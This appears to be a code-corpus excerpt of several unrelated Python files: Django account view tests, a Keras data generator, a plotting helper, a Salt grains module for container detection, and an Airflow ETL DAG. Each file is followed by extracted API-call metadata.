input_waterfall_dates\n'), ((7526, 7547), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig2'], {}), '(fig2)\n', (7541, 7547), True, 'import streamlit as st\n'), ((8651, 8711), 'streamlit_prophet.lib.exposition.expanders.display_expander', 'display_expander', (['readme', '"""future"""', '"""More info on this plot"""'], {}), "(readme, 'future', 'More info on this plot')\n", (8667, 8711), False, 'from streamlit_prophet.lib.exposition.expanders import display_expander, display_expanders_performance\n'), ((8784, 8924), 'fbprophet.plot.plot_plotly', 'plot_plotly', (["models['future']", "forecasts['future']"], {'ylabel': 'target_col', 'changepoints': 'bool_param', 'trend': 'bool_param', 'uncertainty': 'bool_param'}), "(models['future'], forecasts['future'], ylabel=target_col,\n changepoints=bool_param, trend=bool_param, uncertainty=bool_param)\n", (8795, 8924), False, 'from fbprophet.plot import plot_plotly\n'), ((9074, 9094), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig'], {}), '(fig)\n', (9089, 9094), True, 'import streamlit as st\n'), ((14705, 14774), 'plotly.figure_factory.create_distplot', 'ff.create_distplot', (['residuals', 'labels'], {'show_hist': '(False)', 'colors': 'colors'}), '(residuals, labels, show_hist=False, colors=colors)\n', (14723, 14774), True, 'import plotly.figure_factory as ff\n'), ((18139, 18182), 'streamlit_prophet.lib.exposition.preparation.get_forecast_components', 'get_forecast_components', (['model', 'forecast_df'], {}), '(model, forecast_df)\n', (18162, 18182), False, 'from streamlit_prophet.lib.exposition.preparation import get_forecast_components, prepare_waterfall\n'), ((18268, 18331), 'plotly.subplots.make_subplots', 'make_subplots', ([], {'rows': 'n_features', 'cols': '(1)', 'subplot_titles': 'features'}), '(rows=n_features, cols=1, subplot_titles=features)\n', (18281, 18331), False, 'from plotly.subplots import make_subplots\n'), ((21929, 21980), 'streamlit_prophet.lib.exposition.preparation.prepare_waterfall', 'prepare_waterfall', (['components', 'start_date', 'end_date'], {}), '(components, start_date, end_date)\n', (21946, 21980), False, 'from streamlit_prophet.lib.exposition.preparation import get_forecast_components, prepare_waterfall\n'), ((24247, 24323), 'streamlit_prophet.lib.evaluation.metrics.get_perf_metrics', 'get_perf_metrics', (['evaluation_df', 'eval_all', 'dates', 'resampling', 'use_cv', 'config'], {}), '(evaluation_df, eval_all, dates, resampling, use_cv, config)\n', (24263, 24323), False, 'from streamlit_prophet.lib.evaluation.metrics import get_perf_metrics\n'), ((10017, 10105), 'plotly.express.line', 'px.line', (['eval_df'], {'x': '"""ds"""', 'y': '"""forecast"""', 'color': '"""Fold"""', 'color_discrete_sequence': 'colors'}), "(eval_df, x='ds', y='forecast', color='Fold',\n color_discrete_sequence=colors)\n", (10024, 10105), True, 'import plotly.express as px\n'), ((10479, 10643), 'plotly.express.line', 'px.line', (['eval_df'], {'x': '"""ds"""', 'y': "['truth', 'forecast']", 'color_discrete_sequence': "style['colors'][1:]", 'hover_data': "{'variable': True, 'value': ':.4f', 'ds': False}"}), "(eval_df, x='ds', y=['truth', 'forecast'], color_discrete_sequence=\n style['colors'][1:], hover_data={'variable': True, 'value': ':.4f',\n 'ds': False})\n", (10486, 10643), True, 'import plotly.express as px\n'), ((12412, 12587), 'plotly.express.scatter', 'px.scatter', (['eval_df'], {'x': '"""truth"""', 'y': '"""forecast"""', 'color': '"""Fold"""', 'opacity': '(0.5)', 'color_discrete_sequence': 'colors', 'hover_data': "{'date': True, 'truth': ':.4f', 'forecast': ':.4f'}"}), "(eval_df, x='truth', y='forecast', color='Fold', opacity=0.5,\n color_discrete_sequence=colors, hover_data={'date': True, 'truth':\n ':.4f', 'forecast': ':.4f'})\n", (12422, 12587), True, 'import plotly.express as px\n'), ((12699, 12873), 'plotly.express.scatter', 'px.scatter', (['eval_df'], {'x': '"""truth"""', 'y': '"""forecast"""', 'opacity': '(0.5)', 'color_discrete_sequence': "style['colors'][2:]", 'hover_data': "{'date': True, 'truth': ':.4f', 'forecast': ':.4f'}"}), "(eval_df, x='truth', y='forecast', opacity=0.5,\n color_discrete_sequence=style['colors'][2:], hover_data={'date': True,\n 'truth': ':.4f', 'forecast': ':.4f'})\n", (12709, 12873), True, 'import plotly.express as px\n'), ((14462, 14493), 'pandas.Series', 'pd.Series', (["eval_df['residuals']"], {}), "(eval_df['residuals'])\n", (14471, 14493), True, 'import pandas as pd\n'), ((17083, 17103), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig'], {}), '(fig)\n', (17098, 17103), True, 'import streamlit as st\n'), ((17214, 17238), 'streamlit.dataframe', 'st.dataframe', (['metrics_df'], {}), '(metrics_df)\n', (17226, 17238), True, 'import streamlit as st\n'), ((24347, 24371), 'streamlit.dataframe', 'st.dataframe', (['metrics_df'], {}), '(metrics_df)\n', (24359, 24371), True, 'import streamlit as st\n'), ((24421, 24434), 'streamlit.columns', 'st.columns', (['(5)'], {}), '(5)\n', (24431, 24434), True, 'import streamlit as st\n'), ((10208, 10353), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': "eval_df['ds']", 'y': "eval_df['truth']", 'name': '"""Truth"""', 'mode': '"""lines"""', 'line': "{'color': style['color_axis'], 'dash': 'dot', 'width': 1.5}"}), "(x=eval_df['ds'], y=eval_df['truth'], name='Truth', mode='lines',\n line={'color': style['color_axis'], 'dash': 'dot', 'width': 1.5})\n", (10218, 10353), True, 'import plotly.graph_objects as go\n'), ((16728, 16820), 'plotly.graph_objects.Bar', 'go.Bar', ([], {'x': "perf[metric][eval['granularity']]", 'y': 'perf[metric][metric]', 'marker_color': 'colors'}), "(x=perf[metric][eval['granularity']], y=perf[metric][metric],\n marker_color=colors)\n", (16734, 16820), True, 'import plotly.graph_objects as go\n'), ((21849, 21898), 'streamlit_prophet.lib.exposition.preparation.get_forecast_components', 'get_forecast_components', (['model', 'forecast_df', '(True)'], {}), '(model, forecast_df, True)\n', (21872, 21898), False, 'from streamlit_prophet.lib.exposition.preparation import get_forecast_components, prepare_waterfall\n'), ((19565, 19622), 'pandas.date_range', 'pd.date_range', ([], {'start': 'f"""{year}-01-01"""', 'end': 'f"""{year}-12-31"""'}), "(start=f'{year}-01-01', end=f'{year}-12-31')\n", (19578, 19622), True, 'import pandas as pd\n'), ((22022, 22048), 'pandas.to_datetime', 'pd.to_datetime', (['start_date'], {}), '(start_date)\n', (22036, 22048), True, 'import pandas as pd\n'), ((22064, 22088), 'pandas.to_datetime', 'pd.to_datetime', (['end_date'], {}), '(end_date)\n', (22078, 22088), True, 'import pandas as pd\n')] |
from django.test import Client
from django.test import TestCase
from django.urls import reverse
from django.contrib.auth import get_user_model
from model_mommy import mommy
from django.conf import settings
User = get_user_model()
class RegisterViewTestCase(TestCase):
def setUp(self):
self.client = Client()
self.register_url = reverse('accounts:register')
def test_register_ok(self):
data = {
'username': 'jhowuserteste', 'email': '<EMAIL>',
'password1': '<PASSWORD>','password2': '<PASSWORD>',
}
response = self.client.post(self.register_url, data)
login_url = reverse('login')
self.assertRedirects(response, login_url)
self.assertEquals(User.objects.count(), 1)
def test_register_fail(self):
data = {
'username': 'jhowuserteste', 'password1': '<PASSWORD>',
'password2': '<PASSWORD>',
}
response = self.client.post(self.register_url, data)
self.assertFormError(response, 'form', 'email', 'Este campo é obrigatório.')
class UpdateUserTestCase(TestCase):
def setUp(self):
self.client = Client()
self.url = reverse('accounts:update_user')
self.user = mommy.prepare(settings.AUTH_USER_MODEL)
self.user.set_password('<PASSWORD>')
self.user.save()
def tearDown(self):
self.user.delete()
def test_update_user_ok(self):
data = {'name': 'humbree', 'email':'<EMAIL>'}
response = self.client.get(self.url)
self.assertEquals(response.status_code, 302)
self.client.login(username=self.user.username, password='<PASSWORD>')
response = self.client.post(self.url, data)
accounst_index_url = reverse('accounts:index')
self.assertRedirects(response, accounst_index_url)
#user = User.objects.get(username=self.user.username)
self.user.refresh_from_db()
self.assertEquals(self.user.email, '<EMAIL>')
self.assertEquals(self.user.name, 'humbree')
def test_update_user_error(self):
data = {}
self.client.login(username=self.user.username, password='<PASSWORD>')
response = self.client.post(self.url, data)
self.assertFormError(response, 'form', 'email', 'Este campo é obrigatório.')
class UpdatePasswordTestCase(TestCase):
def setUp(self):
self.client = Client()
self.url = reverse('accounts:update_password')
self.user = mommy.prepare(settings.AUTH_USER_MODEL)
self.user.set_password('<PASSWORD>')
self.user.save()
def tearDown(self):
self.user.delete()
def test_update_password_ok(self):
data = {
'old_password': '<PASSWORD>', 'new_password1':'<PASSWORD>',
'new_password2':'<PASSWORD>',
}
self.client.login(username=self.user.username, password='<PASSWORD>')
response = self.client.post(self.url, data)
self.user.refresh_from_db()
#user = User.objects.get(username=self.user.username)
self.assertTrue(self.user.check_password('<PASSWORD>'))
| [
"django.urls.reverse",
"django.contrib.auth.get_user_model",
"model_mommy.mommy.prepare",
"django.test.Client"
] | [((214, 230), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (228, 230), False, 'from django.contrib.auth import get_user_model\n'), ((313, 321), 'django.test.Client', 'Client', ([], {}), '()\n', (319, 321), False, 'from django.test import Client\n'), ((350, 378), 'django.urls.reverse', 'reverse', (['"""accounts:register"""'], {}), "('accounts:register')\n", (357, 378), False, 'from django.urls import reverse\n'), ((647, 663), 'django.urls.reverse', 'reverse', (['"""login"""'], {}), "('login')\n", (654, 663), False, 'from django.urls import reverse\n'), ((1164, 1172), 'django.test.Client', 'Client', ([], {}), '()\n', (1170, 1172), False, 'from django.test import Client\n'), ((1192, 1223), 'django.urls.reverse', 'reverse', (['"""accounts:update_user"""'], {}), "('accounts:update_user')\n", (1199, 1223), False, 'from django.urls import reverse\n'), ((1244, 1283), 'model_mommy.mommy.prepare', 'mommy.prepare', (['settings.AUTH_USER_MODEL'], {}), '(settings.AUTH_USER_MODEL)\n', (1257, 1283), False, 'from model_mommy import mommy\n'), ((1753, 1778), 'django.urls.reverse', 'reverse', (['"""accounts:index"""'], {}), "('accounts:index')\n", (1760, 1778), False, 'from django.urls import reverse\n'), ((2402, 2410), 'django.test.Client', 'Client', ([], {}), '()\n', (2408, 2410), False, 'from django.test import Client\n'), ((2430, 2465), 'django.urls.reverse', 'reverse', (['"""accounts:update_password"""'], {}), "('accounts:update_password')\n", (2437, 2465), False, 'from django.urls import reverse\n'), ((2486, 2525), 'model_mommy.mommy.prepare', 'mommy.prepare', (['settings.AUTH_USER_MODEL'], {}), '(settings.AUTH_USER_MODEL)\n', (2499, 2525), False, 'from model_mommy import mommy\n')] |
"""
DUNE CVN generator module.
"""
__version__ = '1.0'
__author__ = '<NAME>, <NAME>'
__email__ = "<EMAIL>, <EMAIL>"
import numpy as np
import zlib
class DataGenerator(object):
''' Generate data for tf.keras.
'''
def __init__(self, cells=500, planes=500, views=3, batch_size=32,
images_path = 'dataset', shuffle=True, test_values=[]):
''' Constructor.
Args:
cells: image cells.
planes: image planes.
views: number of views.
batch_size: batch size.
images_path: path of input events.
shuffle: shuffle the events.
test_values: array to be filled with test values.
'''
self.cells = cells
self.planes = planes
self.views = views
self.batch_size = batch_size
self.images_path = images_path
self.shuffle = shuffle
self.test_values = test_values
def generate(self, labels, list_IDs):
''' Generates batches of samples.
Args:
labels: event labels.
list_IDs: event IDs within partition.
Yields: a batch of events.
'''
# infinite loop
while 1:
# generate random order of exploration of dataset (to make each epoch different)
indexes = self.get_exploration_order(list_IDs)
# generate batches
imax = int(len(indexes)/self.batch_size) # number of batches
for i in range(imax):
# find list of IDs for one batch
list_IDs_temp = [list_IDs[k] for k in indexes[i*self.batch_size:(i+1)*self.batch_size]]
# generate data
X = self.data_generation(labels, list_IDs_temp)
yield X
def get_exploration_order(self, list_IDs):
''' Generates order of exploration.
Args:
list_IDs: event IDs within partition.
Returns: random order of exploration.
'''
# find exploration order
indexes = np.arange(len(list_IDs))
if self.shuffle == True:
np.random.shuffle(indexes)
return indexes
def data_generation(self, labels, list_IDs_temp):
''' Generates data of batch_size sample.
Args:
labels: event labels.
list_IDs: event IDs within partition.
Returns: a batch of events.
'''
X = [None]*self.views
for view in range(self.views):
X[view] = np.empty((self.batch_size, self.planes, self.cells, 1), dtype='float32')
# generate data
for i, ID in enumerate(list_IDs_temp):
# decompress images into pixel numpy array
with open('dataset/event' + ID + '.gz', 'rb') as image_file:
pixels = np.fromstring(zlib.decompress(image_file.read()), dtype=np.uint8, sep='')
pixels = pixels.reshape(self.views, self.planes, self.cells)
# store volume
for view in range(self.views):
X[view][i, :, :, :] = pixels[view, :, :].reshape(self.planes, self.cells, 1)
# get y label
y_value = labels[ID]
# store actual y label
self.test_values.append(y_value)
return X
| [
"numpy.empty",
"numpy.random.shuffle"
] | [((2123, 2149), 'numpy.random.shuffle', 'np.random.shuffle', (['indexes'], {}), '(indexes)\n', (2140, 2149), True, 'import numpy as np\n'), ((2517, 2589), 'numpy.empty', 'np.empty', (['(self.batch_size, self.planes, self.cells, 1)'], {'dtype': '"""float32"""'}), "((self.batch_size, self.planes, self.cells, 1), dtype='float32')\n", (2525, 2589), True, 'import numpy as np\n')] |
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
def show_batch(ds: tf.data.Dataset,
classes: list,
rescale: bool = False,
size: tuple = (10, 10),
title: str = None):
"""
Function to show a batch of images including labels from tf.data object
Args:
ds: a (batched) tf.data.Dataset
classes: a list of all classes (in order of one-hot-encoding)
rescale: boolen whether to multiple image values by 255
size: tuple giving plot size
title: plot title
Returns:
matplotlib.pyplot
"""
plt.figure(figsize=size)
# Take on batch from dataset and iterate over image-label-combination
for image, label in ds.take(1):
image_array = image.numpy()
# Undo scaling in preprocess_input or plotting
image_array += 1.0
image_array /= 2.0
label_array = label.numpy()
batch_size = image_array.shape[0]
for idx in range(batch_size):
label = classes[np.argmax(label_array[idx])]
ax = plt.subplot(np.ceil(batch_size / 4), 4, idx + 1)
if rescale:
plt.imshow(image_array[idx] * 255)
else:
plt.imshow(image_array[idx])
plt.title(label + ' ' + str(image_array[idx].shape), fontsize=10)
plt.axis('off')
if title is not None:
plt.suptitle(title)
plt.tight_layout(rect=[0, 0.03, 1, 0.95])
plt.show()
def create_target_list(files: list, target: str = 'make') -> list:
"""
Create a list of unique target classes from file names
Args:
files: a list of file names
target: either 'model' or 'make'
Returns:
list of classes
"""
if target not in ['make', 'model']:
raise ValueError('target must be either "make" or "model"')
if target == 'make':
classes = list(set([file.split('_')[0] for file in files]))
if target == 'model':
classes = list(set([file.split('_')[0] + '_' + file.split('_')[1] for file in files]))
return classes
| [
"matplotlib.pyplot.imshow",
"numpy.ceil",
"numpy.argmax",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.axis",
"matplotlib.pyplot.suptitle",
"matplotlib.pyplot.show"
] | [((640, 664), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'size'}), '(figsize=size)\n', (650, 664), True, 'import matplotlib.pyplot as plt\n'), ((1464, 1505), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {'rect': '[0, 0.03, 1, 0.95]'}), '(rect=[0, 0.03, 1, 0.95])\n', (1480, 1505), True, 'import matplotlib.pyplot as plt\n'), ((1510, 1520), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1518, 1520), True, 'import matplotlib.pyplot as plt\n'), ((1439, 1458), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['title'], {}), '(title)\n', (1451, 1458), True, 'import matplotlib.pyplot as plt\n'), ((1388, 1403), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (1396, 1403), True, 'import matplotlib.pyplot as plt\n'), ((1065, 1092), 'numpy.argmax', 'np.argmax', (['label_array[idx]'], {}), '(label_array[idx])\n', (1074, 1092), True, 'import numpy as np\n'), ((1123, 1146), 'numpy.ceil', 'np.ceil', (['(batch_size / 4)'], {}), '(batch_size / 4)\n', (1130, 1146), True, 'import numpy as np\n'), ((1200, 1234), 'matplotlib.pyplot.imshow', 'plt.imshow', (['(image_array[idx] * 255)'], {}), '(image_array[idx] * 255)\n', (1210, 1234), True, 'import matplotlib.pyplot as plt\n'), ((1269, 1297), 'matplotlib.pyplot.imshow', 'plt.imshow', (['image_array[idx]'], {}), '(image_array[idx])\n', (1279, 1297), True, 'import matplotlib.pyplot as plt\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Makina custom grains
=====================
makina.upstart
true if using upstart
makina.lxc
true if inside an lxc container
makina.docker
true if inside a docker container
makina.devhost_num
devhost num if any
'''
import os
import copy
import subprocess
_cache = {}
def init_environ(_o=None):
key = 'init_environ'
try:
return _cache[key]
except KeyError:
try:
with open('/proc/1/environ') as fic:
_cache[key] = fic.read()
except (IOError, OSError):
_cache[key] = ''
return _cache[key]
def _is_travis(_o=None):
is_nodetype = None
val = "{0}".format(os.environ.get('TRAVIS', 'false')).lower()
if val in ['y', 't', 'o', 'true', '1']:
is_nodetype = True
elif val:
is_nodetype = False
return is_nodetype
def _is_docker(_o=None):
"""
Return true if we find a system or grain flag
that explicitly shows us we are in a DOCKER context
"""
if _o is None:
try:
_o = __opts__
except NameError:
_o = {}
docker = False
try:
docker = bool(__grains__.get('makina.docker'))
except (ValueError, NameError, IndexError):
pass
if not docker:
docker = 'docker' in init_environ()
if not docker:
for i in ['.dockerinit', '/.dockerinit']:
if os.path.exists(i):
docker = True
return docker
def _is_lxc(_o=None):
"""
Return true if we find a system or grain flag
that explicitly shows us we are in a LXC context
in case of a container, we have the container name in cgroups
else, it is equal to /
in lxc:
['11:name=systemd:/user/1000.user/1.session',
'10:hugetlb:/thisname',
'9:perf_event:/thisname',
'8:blkio:/thisname',
'7:freezer:/thisname',
'6:devices:/thisname',
'5:memory:/thisname',
'4:cpuacct:/thisname',
'3:cpu:/thisname',
'2:cpuset:/thisname']
in host:
['11:name=systemd:/',
'10:hugetlb:/',
'9:perf_event:/',
'8:blkio:/',
'7:freezer:/',
'6:devices:/',
'5:memory:/',
'4:cpuacct:/',
'3:cpu:/',
'2:cpuset:/']
"""
if _o is None:
try:
_o = __opts__
except NameError:
_o = {}
lxc = None
if _is_docker(_o=_o):
lxc = False
if lxc is None:
try:
lxc = __grains__.get('makina.lxc', None)
except (ValueError, NameError, IndexError):
pass
if lxc is None:
try:
cgroups = open('/proc/1/cgroup').read().splitlines()
lxc = not '/' == [a.split(':')[-1]
for a in cgroups
if ':cpu:' in a or
':cpuset:' in a][-1]
except Exception:
lxc = False
if not lxc:
try:
content = open('/proc/1/environ').read()
lxc = 'container=lxc' in content
except Exception:
lxc = False
return lxc and not _is_docker(_o=_o)
def _is_container(_o=None):
return _is_docker() or _is_lxc(_o=_o)
def _devhost_num(_o=None):
return ''
# devhost will be removed from makina-states sooner or later
# if os.path.exists('/root/vagrant/provision_settings.sh'):
# num = subprocess.Popen(
# 'bash -c "'
# '. /root/vagrant/provision_settings.sh;'
# 'echo \$DEVHOST_NUM"',
# shell=True, stdout=subprocess.PIPE
# ).stdout.read().strip()
# if not num:
# num = '0'
# return num
def _routes(_o=None):
routes, default_route = [], {}
troutes = subprocess.Popen(
'bash -c "netstat -nr"',
shell=True, stdout=subprocess.PIPE
).stdout.read().strip()
for route in troutes.splitlines()[1:]:
try:
parts = route.split()
if 'dest' in parts[0].lower():
continue
droute = {'iface': parts[-1],
'gateway': parts[1],
'genmask': parts[2],
'flags': parts[3],
'mss': parts[4],
'window': parts[5],
'irtt': parts[6]}
if parts[0] == '0.0.0.0':
default_route = copy.deepcopy(droute)
routes.append(droute)
except Exception:
continue
return routes, default_route, default_route.get('gateway', None)
def _is_vm(_o=None):
ret = False
if _is_container(_o=_o):
ret = True
return ret
def _is_devhost(_o=None):
return _devhost_num(_o=_o) != ''
def _get_msconf(param, _o=None):
if _o is None:
_o = __opts__
cfgdir = os.path.abspath(_o.get('config_dir', '/etc/salt'))
nds = [os.path.join(cfgdir, 'makina-states'),
os.path.join(os.path.dirname(cfgdir), 'makina-states')]
for nd in nds:
try:
with open(os.path.join(nd, param)) as fic:
content = fic.read().strip()
if content:
break
except (OSError, IOError):
content = ''
return content
def _nodetype(_o=None):
return _get_msconf('nodetype', _o=_o)
def _is_vagrantvm(_o=None):
return _nodetype(_o=_o) in ['vagrantvm']
def _is_kvm(_o=None):
return _nodetype(_o=_o) in ['kvm']
def _is_server(_o=None):
return _nodetype(_o=_o) in ['server']
def _is_laptop(_o=None):
return _nodetype(_o=_o) in ['laptop']
def _is_upstart(_o=None):
if os.path.exists('/var/log/upstart'):
return True
return False
def _is_systemd(_o=None):
try:
is_ = os.readlink('/proc/1/exe') == '/lib/systemd/systemd'
except (IOError, OSError):
is_ = False
rd = '/run/systemd'
try:
# ubuntu trusty has a light systemd running ...
if os.path.exists(rd) and len(os.listdir(rd)) > 4:
is_ = True
except (IOError, OSError):
is_ = False
return is_
def _pgsql_vers(_o=None):
vers = {'details': {}, 'global': {}}
for i in ['9.0', '9.1', '9.3', '9.4', '10.0', '10.1']:
pid = (
'/var/lib/postgresql/{0}'
'/main/postmaster.pid'.format(i))
dbase = (
'/var/lib/postgresql/{0}'
'/main/base'.format(i))
dglobal = (
'/var/lib/postgresql/{0}'
'/main/global'.format(i))
running = False
has_data = False
if os.path.exists(pid):
running = True
for d in [dbase, dglobal]:
if not os.path.exists(d):
continue
if os.listdir(d) > 2:
has_data = True
if running or has_data:
vers['global'][i] = True
vers['details'][i] = {'running': running,
'has_data': has_data}
return vers
def get_makina_grains(_o=None):
'''
'''
routes, default_route, gw = _routes(_o=_o)
grains = {'makina.upstart': _is_upstart(_o=_o),
'makina.systemd': _is_systemd(_o=_o),
'makina.nodetype': _nodetype(_o=_o),
'makina.container': _is_container(_o=_o),
'makina.server': _is_server(_o=_o),
'makina.vm': _is_vm(_o=_o),
'makina.laptop': _is_laptop(_o=_o),
'makina.travis': _is_travis(_o=_o),
'makina.lxc': _is_lxc(_o=_o),
'makina.docker': _is_docker(_o=_o),
'makina.kvm': _is_kvm(_o=_o),
'makina.vagrantvm': _is_vagrantvm(_o=_o),
'makina.devhost': _is_devhost(_o=_o),
'makina.devhost_num': _devhost_num(_o=_o),
'makina.pgsql_vers': _pgsql_vers(_o=_o),
'makina.default_route': default_route,
'makina.default_gw': gw,
'makina.routes': routes}
return grains
# vim:set et sts=4 ts=4 tw=80:
| [
"os.path.exists",
"os.listdir",
"os.readlink",
"subprocess.Popen",
"os.path.join",
"os.environ.get",
"os.path.dirname",
"copy.deepcopy"
] | [((5692, 5726), 'os.path.exists', 'os.path.exists', (['"""/var/log/upstart"""'], {}), "('/var/log/upstart')\n", (5706, 5726), False, 'import os\n'), ((4942, 4979), 'os.path.join', 'os.path.join', (['cfgdir', '"""makina-states"""'], {}), "(cfgdir, 'makina-states')\n", (4954, 4979), False, 'import os\n'), ((6633, 6652), 'os.path.exists', 'os.path.exists', (['pid'], {}), '(pid)\n', (6647, 6652), False, 'import os\n'), ((1432, 1449), 'os.path.exists', 'os.path.exists', (['i'], {}), '(i)\n', (1446, 1449), False, 'import os\n'), ((5005, 5028), 'os.path.dirname', 'os.path.dirname', (['cfgdir'], {}), '(cfgdir)\n', (5020, 5028), False, 'import os\n'), ((5816, 5842), 'os.readlink', 'os.readlink', (['"""/proc/1/exe"""'], {}), "('/proc/1/exe')\n", (5827, 5842), False, 'import os\n'), ((6020, 6038), 'os.path.exists', 'os.path.exists', (['rd'], {}), '(rd)\n', (6034, 6038), False, 'import os\n'), ((709, 742), 'os.environ.get', 'os.environ.get', (['"""TRAVIS"""', '"""false"""'], {}), "('TRAVIS', 'false')\n", (723, 742), False, 'import os\n'), ((4452, 4473), 'copy.deepcopy', 'copy.deepcopy', (['droute'], {}), '(droute)\n', (4465, 4473), False, 'import copy\n'), ((6735, 6752), 'os.path.exists', 'os.path.exists', (['d'], {}), '(d)\n', (6749, 6752), False, 'import os\n'), ((6794, 6807), 'os.listdir', 'os.listdir', (['d'], {}), '(d)\n', (6804, 6807), False, 'import os\n'), ((5102, 5125), 'os.path.join', 'os.path.join', (['nd', 'param'], {}), '(nd, param)\n', (5114, 5125), False, 'import os\n'), ((6047, 6061), 'os.listdir', 'os.listdir', (['rd'], {}), '(rd)\n', (6057, 6061), False, 'import os\n'), ((3812, 3889), 'subprocess.Popen', 'subprocess.Popen', (['"""bash -c "netstat -nr\\""""'], {'shell': '(True)', 'stdout': 'subprocess.PIPE'}), '(\'bash -c "netstat -nr"\', shell=True, stdout=subprocess.PIPE)\n', (3828, 3889), False, 'import subprocess\n')] |
from cgi import FieldStorage
from datetime import date
from io import BytesIO
from onegov.core.utils import Bunch
from onegov.form import Form
from onegov.wtfs.fields import HintField
from onegov.wtfs.fields import MunicipalityDataUploadField
class PostData(dict):
def getlist(self, key):
v = self[key]
if not isinstance(v, (list, tuple)):
v = [v]
return v
def test_municipality_data_upload_field():
form = Form()
def process(content, **kwargs):
field = MunicipalityDataUploadField(**kwargs)
field = field.bind(form, 'upload')
field_storage = FieldStorage()
field_storage.file = BytesIO(content)
field_storage.type = 'text/plain'
field_storage.filename = 'test.csv'
field.process(PostData({'upload': field_storage}))
return field
# Invalid
field = process('Bäretswil;\r\n'.encode('cp1252'))
assert not field.validate(form)
errors = [error.interpolate() for error in field.errors]
assert "Some rows contain invalid values: 0." in errors
# Valid
field = process('Bäretswil;111;-1;Normal;\r\n'.encode('cp1252'))
assert field.validate(form)
assert field.data == {111: {'dates': []}}
field = process(
'Bäretswil;111;-1;Normal;01.01.2019;07.01.2019\r\n'.encode('cp1252')
)
assert field.validate(form)
assert field.data == {
111: {'dates': [date(2019, 1, 1), date(2019, 1, 7)]}
}
def test_hint_field(wtfs_app):
def get_translate(for_chameleon):
return wtfs_app.chameleon_translations.get('de_CH')
form = Form()
field = HintField(macro='express_shipment_hint')
field = field.bind(form, 'hint')
field.meta.request = Bunch(app=wtfs_app, get_translate=get_translate)
assert field.validate(form)
assert "Für dringende Scan-Aufträge" in field()
| [
"cgi.FieldStorage",
"onegov.form.Form",
"onegov.wtfs.fields.MunicipalityDataUploadField",
"io.BytesIO",
"onegov.core.utils.Bunch",
"datetime.date",
"onegov.wtfs.fields.HintField"
] | [((455, 461), 'onegov.form.Form', 'Form', ([], {}), '()\n', (459, 461), False, 'from onegov.form import Form\n'), ((1610, 1616), 'onegov.form.Form', 'Form', ([], {}), '()\n', (1614, 1616), False, 'from onegov.form import Form\n'), ((1629, 1669), 'onegov.wtfs.fields.HintField', 'HintField', ([], {'macro': '"""express_shipment_hint"""'}), "(macro='express_shipment_hint')\n", (1638, 1669), False, 'from onegov.wtfs.fields import HintField\n'), ((1732, 1780), 'onegov.core.utils.Bunch', 'Bunch', ([], {'app': 'wtfs_app', 'get_translate': 'get_translate'}), '(app=wtfs_app, get_translate=get_translate)\n', (1737, 1780), False, 'from onegov.core.utils import Bunch\n'), ((515, 552), 'onegov.wtfs.fields.MunicipalityDataUploadField', 'MunicipalityDataUploadField', ([], {}), '(**kwargs)\n', (542, 552), False, 'from onegov.wtfs.fields import MunicipalityDataUploadField\n'), ((621, 635), 'cgi.FieldStorage', 'FieldStorage', ([], {}), '()\n', (633, 635), False, 'from cgi import FieldStorage\n'), ((665, 681), 'io.BytesIO', 'BytesIO', (['content'], {}), '(content)\n', (672, 681), False, 'from io import BytesIO\n'), ((1424, 1440), 'datetime.date', 'date', (['(2019)', '(1)', '(1)'], {}), '(2019, 1, 1)\n', (1428, 1440), False, 'from datetime import date\n'), ((1442, 1458), 'datetime.date', 'date', (['(2019)', '(1)', '(7)'], {}), '(2019, 1, 7)\n', (1446, 1458), False, 'from datetime import date\n')] |
from airflow import DAG
from airflow.utils.dates import days_ago
from anyway_etl_airflow.operators.cli_bash_operator import CliBashOperator
dag_kwargs = dict(
default_args={
'owner': 'airflow',
},
schedule_interval='@weekly',
catchup=False,
start_date=days_ago(2),
)
with DAG('cbs', **dag_kwargs,
description='by default imports emails and processes data for (current year - 1). '
'For back-fill do a manual run with following example json: '
'{"load_start_year": 2019}') as cbs_dag:
CliBashOperator(
'anyway-etl cbs import-emails',
skip_if=lambda context: context['dag_run'].conf.get('load_start_year'),
task_id='import-emails'
) >> CliBashOperator(
'anyway-etl cbs process-files',
skip_if=lambda context: context['dag_run'].conf.get('load_start_year'),
task_id='process-files'
) >> [
# for local development you can use the following command to parse all types sequentially:
# anyway-etl cbs parse-all
CliBashOperator(
'anyway-etl cbs parse-accidents'
'{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}',
task_id='parse-accidents'
),
CliBashOperator(
'anyway-etl cbs parse-involved'
'{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}',
task_id='parse-involved'
),
CliBashOperator(
'anyway-etl cbs parse-vehicles'
'{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}',
task_id='parse-vehicles'
),
] >> CliBashOperator(
'anyway-etl cbs import-to-datastore'
'{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}',
task_id='import-to-datastore'
) >> CliBashOperator(
'anyway-etl cbs check-data-in-datastore',
task_id='check-data-in-datastore'
)
| [
"airflow.utils.dates.days_ago",
"anyway_etl_airflow.operators.cli_bash_operator.CliBashOperator",
"airflow.DAG"
